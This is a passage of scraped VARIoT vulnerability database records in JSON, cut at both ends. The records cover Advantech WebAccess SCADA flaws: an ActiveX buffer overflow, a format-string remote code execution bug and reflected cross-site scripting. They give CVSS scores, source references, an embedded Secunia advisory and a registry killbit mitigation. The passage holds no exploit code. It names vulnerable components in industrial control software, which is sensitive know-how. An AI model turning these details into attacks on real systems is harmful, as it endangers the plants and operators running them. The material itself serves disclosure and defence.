"acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2012-0243", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "1a349328-2354-11e6-abef-000c29c66e3d", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-53524", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-0243", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2012-0243", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201202-419", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "1a349328-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-53524", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "1a349328-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53524" }, { "db": "JVNDB", "id": "JVNDB-2012-001561" }, { "db": "CNNVD", "id": "CNNVD-201202-419" }, { "db": "NVD", "id": "CVE-2012-0243" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow in an ActiveX control in bwocxrun.ocx in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code by leveraging the ability to write arbitrary content to any pathname. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2012-0243" }, { "db": "JVNDB", "id": "JVNDB-2012-001561" }, { "db": "CNVD", "id": "CNVD-2012-0671" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "1a349328-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53524" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-0243", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNNVD", "id": "CNNVD-201202-419", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0671", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001561", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "1A349328-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-53524", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "1a349328-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0671" }, { "db": "VULHUB", "id": "VHN-53524" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001561" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-419" }, { "db": "NVD", "id": "CVE-2012-0243" } ] }, "id": "VAR-201202-0223", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "1a349328-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0671" }, { "db": "VULHUB", "id": "VHN-53524" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "1a349328-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0671" } ] }, "last_update_date": "2024-11-23T21:46:31.469000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess Vulnerability (CNVD-2012-0671)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10414" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0671" }, { "db": "JVNDB", "id": "JVNDB-2012-001561" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-53524" }, { "db": "JVNDB", "id": "JVNDB-2012-001561" }, { "db": "NVD", "id": "CVE-2012-0243" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0243" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0243" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0671" }, { "db": "VULHUB", "id": "VHN-53524" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001561" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-419" }, { "db": "NVD", "id": "CVE-2012-0243" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "1a349328-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0671" }, { "db": "VULHUB", "id": "VHN-53524" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001561" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-419" }, { "db": "NVD", "id": "CVE-2012-0243" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "1a349328-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0671" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-53524" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001561" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-419" }, { "date": "2012-02-21T13:31:57.237000", "db": "NVD", "id": "CVE-2012-0243" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0671" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-53524" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001561" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-419" }, { "date": "2024-11-21T01:34:39.010000", "db": "NVD", "id": "CVE-2012-0243" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-419" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess of ActiveX Control buffer overflow vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001561" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "1a349328-2354-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201202-419" } ], "trust": 0.8 } }
var-201708-1720
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of a user-supplied string before using it as a format specifier. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-542" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-542" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-542", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-542", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-542" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of a user-supplied string before using it as a format specifier. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-542" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4072", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-542", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-542" } ] }, "id": "VAR-201708-1720", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:09:45.573000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-542" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-542" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-542", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-542", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-542", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media ExecuteURLCommand Format String Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-542" } ], "trust": 0.7 } }
var-201810-0127
Vulnerability from variot
Advantech WebAccess 8.3.2 and below is vulnerable to multiple reflected cross site scripting vulnerabilities. A remote unauthenticated attacker could potentially exploit this vulnerability by tricking a victim to supply malicious HTML or JavaScript code to WebAccess, which is then reflected back to the victim and executed by the web browser. Advantech WebAccess Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0127", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.2" }, { "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.3.2" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2fea1c0-39ab-11e9-aa50-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21798" }, { "db": "JVNDB", "id": "JVNDB-2018-011102" }, { "db": "CNNVD", "id": "CNNVD-201810-1119" }, { "db": "NVD", "id": "CVE-2018-15703" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011102" } ] }, "cve": "CVE-2018-15703", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2018-15703", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CNVD-2018-21798", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "e2fea1c0-39ab-11e9-aa50-000c29342cb1", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "VHN-125989", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitabilityScore": 2.8, "id": "CVE-2018-15703", "impactScore": 2.7, "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-15703", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2018-15703", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2018-21798", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201810-1119", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "e2fea1c0-39ab-11e9-aa50-000c29342cb1", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-125989", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "e2fea1c0-39ab-11e9-aa50-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21798" }, { "db": "VULHUB", "id": "VHN-125989" }, { "db": "JVNDB", "id": "JVNDB-2018-011102" }, { "db": "CNNVD", "id": "CNNVD-201810-1119" }, { "db": "NVD", "id": "CVE-2018-15703" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess 8.3.2 and below is vulnerable to multiple reflected cross site scripting vulnerabilities. A remote unauthenticated attacker could potentially exploit this vulnerability by tricking a victim to supply malicious HTML or JavaScript code to WebAccess, which is then reflected back to the victim and executed by the web browser. Advantech WebAccess Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2018-15703" }, { "db": "JVNDB", "id": "JVNDB-2018-011102" }, { "db": "CNVD", "id": "CNVD-2018-21798" }, { "db": "IVD", "id": "e2fea1c0-39ab-11e9-aa50-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-125989" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-15703", "trust": 3.3 }, { "db": "TENABLE", "id": "TRA-2018-33", "trust": 2.5 }, { "db": "CNNVD", "id": "CNNVD-201810-1119", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-21798", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-011102", "trust": 0.8 }, { "db": "IVD", "id": "E2FEA1C0-39AB-11E9-AA50-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-125989", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2fea1c0-39ab-11e9-aa50-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21798" }, { "db": "VULHUB", "id": "VHN-125989" }, { "db": "JVNDB", "id": "JVNDB-2018-011102" }, { "db": "CNNVD", "id": "CNNVD-201810-1119" }, { "db": "NVD", "id": "CVE-2018-15703" } ] }, "id": "VAR-201810-0127", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": 